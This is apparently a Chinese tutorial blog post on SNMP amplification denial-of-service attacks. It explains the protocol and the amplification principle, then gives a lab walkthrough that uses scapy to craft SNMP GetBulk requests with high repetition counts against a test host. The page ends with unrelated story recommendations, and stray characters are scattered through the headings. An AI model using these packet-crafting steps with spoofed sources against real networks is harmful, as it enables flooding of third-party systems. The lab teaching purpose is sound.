二十八跌捆、拒絕服務(wù)--(6)SNMP放大攻擊

1徽职、SNMP簡(jiǎn)單網(wǎng)絡(luò)管理協(xié)議

• 服務(wù)端口UDP161/162（服務(wù)端抓客戶端信息，客戶端port為161佩厚；客戶端trap方式主動(dòng)發(fā)往服務(wù)端姆钉，服務(wù)端port為162）
• 管理站（manager/客戶端）、被管理設(shè)備（agent/服務(wù)端）
• 管理信息數(shù)據(jù)庫(kù)（MIB）是一個(gè)信息存儲(chǔ)庫(kù)抄瓦，包含過(guò)管理代理中的有關(guān)配置和性能的數(shù)據(jù)潮瓶，按照不同分類，包含分屬不同組的多個(gè)數(shù)據(jù)對(duì)象
• 每一個(gè)節(jié)點(diǎn)都有一個(gè)對(duì)象標(biāo)識(shí)符（OID）唯一的標(biāo)識(shí)
• IETF定義標(biāo)準(zhǔn)的MIB庫(kù)/廠家自定義MIB庫(kù)

2钙姊、攻擊原理

• 請(qǐng)求流量小毯辅，查詢結(jié)果返回流量大
• 結(jié)合偽造源地址實(shí)現(xiàn)攻擊

3、測(cè)試

測(cè)試圖

• 首先在windows server2003上安裝snmp服務(wù)摸恍，命令行下輸入appwiz.cpl
  
  安裝snmp

配置snmp

使用scapy

>>> i=IP()
>>> i.dst="192.168.50.193"
>>> i.display()
###[ IP ]### 
  version= 4
  ihl= None
  tos= 0x0
  len= None
  id= 1
  flags= 
  frag= 0
  ttl= 64
  proto= hopopt
  chksum= None
  src= 192.168.50.192
  dst= 192.168.50.193 //目標(biāo)snmpclient地址
  \options\

定義udp

>>> u=UDP()
>>> u.dport=161
>>> u.sport=161
>>> u.display()
###[ UDP ]### 
  sport= snmp
  dport= snmp
  len= None
  chksum= None

定義snmp

>>> s.community="snmpclient“
>>> s.community="snmpclient"
>>> s.display()
###[ SNMP ]### 
  version= 0x1 <ASN1_INTEGER[1]>
  community= 'snmpclient'
  \PDU\
   |###[ SNMPget ]### 
   |  id= 0x0 <ASN1_INTEGER[0]>
   |  error= 0x0 <ASN1_INTEGER[0]>
   |  error_index= 0x0 <ASN1_INTEGER[0]>
   |  \varbindlist\

設(shè)置SNMP的bulk

>>> b=SNMPbulk()
>>> b.display()
###[ SNMPbulk ]### 
  id= 0x0 <ASN1_INTEGER[0]>
  non_repeaters= 0x0 <ASN1_INTEGER[0]>
  max_repetitions= 0x0 <ASN1_INTEGER[0]>
  \varbindlist\
>>> b.max_repetitions=200 //重復(fù)發(fā)送200遍查詢

設(shè)置SNMP的PDU

>>> s.PDU=b
>>> b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.19.1.3'))]>>> s.PDU=b
>>> s.display()
###[ SNMP ]### 
  version= 0x1 <ASN1_INTEGER[1]>
  community= 'snmpclient'
  \PDU\
   |###[ SNMPbulk ]### 
   |  id= 0x0 <ASN1_INTEGER[0]>
   |  non_repeaters= 0x0 <ASN1_INTEGER[0]>
   |  max_repetitions= 100
   |  \varbindlist\
   |   |###[ SNMPvarbind ]### 
   |   |  oid= <ASN1_OID['.1.3.6.1.2.1.1']>
   |   |  value= <ASN1_NULL[0]>
   |   |###[ SNMPvarbind ]### 
   |   |  oid= <ASN1_OID['.1.3.6.1.2.1.19.1.3']>
   |   |  value= <ASN1_NULL[0]>

發(fā)送snmp包

>>> r=(i/u/s)
>>> sr1(r)

查看發(fā)送200遍的結(jié)果

snmp抓包結(jié)果

• 人面猴

  序言：七十年代末，一起剝皮案震驚了整個(gè)濱河市立镶，隨后出現(xiàn)的幾起案子壁袄，更是在濱河造成了極大的恐慌，老刑警劉巖媚媒，帶你破解...

  沈念sama閱讀 217,826評(píng)論 6贊 506
• 死咒

  序言：濱河連續(xù)發(fā)生了三起死亡事件嗜逻，死亡現(xiàn)場(chǎng)離奇詭異，居然都是意外死亡缭召，警方通過(guò)查閱死者的電腦和手機(jī)栈顷，發(fā)現(xiàn)死者居然都...

  沈念sama閱讀 92,968評(píng)論 3贊 395
• 救了他兩次的神仙讓他今天三更去死

  文/潘曉璐 我一進(jìn)店門，熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)嵌巷，“玉大人萄凤，你說(shuō)我怎么就攤上這事√履模” “怎么了靡努？”我有些...

  開封第一講書人閱讀 164,234評(píng)論 0贊 354
• 道士緝兇錄：失蹤的賣姜人

  文/不壞的土叔 我叫張陵，是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我惑朦，道長(zhǎng)兽泄，這世上最難降的妖魔是什么？ 我笑而不...

  開封第一講書人閱讀 58,562評(píng)論 1贊 293
• ?港島之戀（遺憾婚禮）

  正文 為了忘掉前任漾月，我火速辦了婚禮病梢，結(jié)果婚禮上，老公的妹妹穿的比我還像新娘梁肿。我一直安慰自己蜓陌，他們只是感情好，可當(dāng)我...

  茶點(diǎn)故事閱讀 67,611評(píng)論 6贊 392
• 惡毒庶女頂嫁案：這布局不是一般人想出來(lái)的

  文/花漫 我一把揭開白布吩蔑。 她就那樣靜靜地躺著护奈，像睡著了一般。 火紅的嫁衣襯著肌膚如雪哥纫。 梳的紋絲不亂的頭發(fā)上，一...

  開封第一講書人閱讀 51,482評(píng)論 1贊 302
• 城市分裂傳說(shuō)

  那天痴奏，我揣著相機(jī)與錄音蛀骇，去河邊找鬼。 笑死读拆，一個(gè)胖子當(dāng)著我的面吹牛擅憔，可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播檐晕，決...

  沈念sama閱讀 40,271評(píng)論 3贊 418
• 雙鴛鴦連環(huán)套：你想象不到人心有多黑

  文/蒼蘭香墨 我猛地睜開眼暑诸，長(zhǎng)吁一口氣：“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼！你這毒婦竟也來(lái)了辟灰？” 一聲冷哼從身側(cè)響起个榕，我...

  開封第一講書人閱讀 39,166評(píng)論 0贊 276
• 萬(wàn)榮殺人案實(shí)錄

  序言：老撾萬(wàn)榮一對(duì)情侶失蹤，失蹤者是張志新（化名）和其女友劉穎芥喇，沒(méi)想到半個(gè)月后西采，有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體，經(jīng)...

  沈念sama閱讀 45,608評(píng)論 1贊 314
• ?護(hù)林員之死

  正文 獨(dú)居荒郊野嶺守林人離奇死亡继控，尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...

  茶點(diǎn)故事閱讀 37,814評(píng)論 3贊 336
• ?白月光啟示錄

  正文 我和宋清朗相戀三年械馆，在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片武通。...

  茶點(diǎn)故事閱讀 39,926評(píng)論 1贊 348
• 活死人

  序言：一個(gè)原本活蹦亂跳的男人離奇死亡霹崎，死狀恐怖，靈堂內(nèi)的尸體忽然破棺而出冶忱，到底是詐尸還是另有隱情尾菇，我是刑警寧澤，帶...

  沈念sama閱讀 35,644評(píng)論 5贊 346
• ?日本核電站爆炸內(nèi)幕

  正文 年R本政府宣布，位于F島的核電站错沽，受9級(jí)特大地震影響簿晓，放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜千埃，卻給世界環(huán)境...

  茶點(diǎn)故事閱讀 41,249評(píng)論 3贊 329
• 男人毒藥：我在死后第九天來(lái)索命

  文/蒙蒙 一憔儿、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧放可，春花似錦谒臼、人聲如沸。這莊子的主人今日做“春日...

  開封第一講書人閱讀 31,866評(píng)論 0贊 22
• 一樁弒父案蜈缤，背后竟有這般陰謀

  文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至冯挎，卻和暖如春底哥，著一層夾襖步出監(jiān)牢的瞬間，已是汗流浹背房官。 一陣腳步聲響...

  開封第一講書人閱讀 32,991評(píng)論 1贊 269
• 情欲美人皮

  我被黑心中介騙來(lái)泰國(guó)打工趾徽， 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留，地道東北人翰守。 一個(gè)月前我還...

  沈念sama閱讀 48,063評(píng)論 3贊 370
• 代替公主和親

  正文 我出身青樓孵奶，卻偏偏與公主長(zhǎng)得像，于是被迫代替她去往敵國(guó)和親蜡峰。 傳聞我的和親對(duì)象是個(gè)殘疾皇子了袁，可洞房花燭夜當(dāng)晚...

  茶點(diǎn)故事閱讀 44,871評(píng)論 2贊 354

推薦閱讀更多精彩內(nèi)容

• 第二十五章： SNMP:簡(jiǎn)單網(wǎng)絡(luò)管理協(xié)議

  25.1 引言 隨著網(wǎng)絡(luò)技術(shù)的飛速發(fā)展，網(wǎng)絡(luò)的數(shù)量也越來(lái)越多湿颅。而網(wǎng)絡(luò)中的設(shè)備來(lái)自各個(gè)不同的廠家载绿，如何管理這些設(shè)備就...

  張芳濤閱讀 2,144評(píng)論 0贊 8
• 揭開SNMP協(xié)議的面紗

  寫在前面：接觸SNMP協(xié)議相關(guān)的告警已經(jīng)有些年頭了，一直沒(méi)有搞清楚SNMP消息有哪些肖爵？實(shí)現(xiàn)原理是什么卢鹦？如果你也在研...

  robot_test_boy閱讀 29,003評(píng)論 4贊 17
• 【筆記】謝希仁—計(jì)網(wǎng)五版：chapter six 應(yīng)用層（二）

  五、電子郵件 1.電子郵件概述 一個(gè)電子郵件系統(tǒng)應(yīng)具有三個(gè)主要組成構(gòu)件：用戶代理劝堪、郵件服務(wù)器冀自、郵件發(fā)送協(xié)議（如SM...

  dmmy大印閱讀 983評(píng)論 0贊 1
• Spring Cloud

  Spring Cloud為開發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見模式的工具（例如配置管理，服務(wù)發(fā)現(xiàn)秒啦，斷路器熬粗，智...

  卡卡羅2017閱讀 134,656評(píng)論 18贊 139
• Linux tcpdump命令詳解

  簡(jiǎn)介 用簡(jiǎn)單的話來(lái)定義tcpdump，就是：dump the traffic on a network余境，根據(jù)使用者...

  保川閱讀 5,956評(píng)論 1贊 13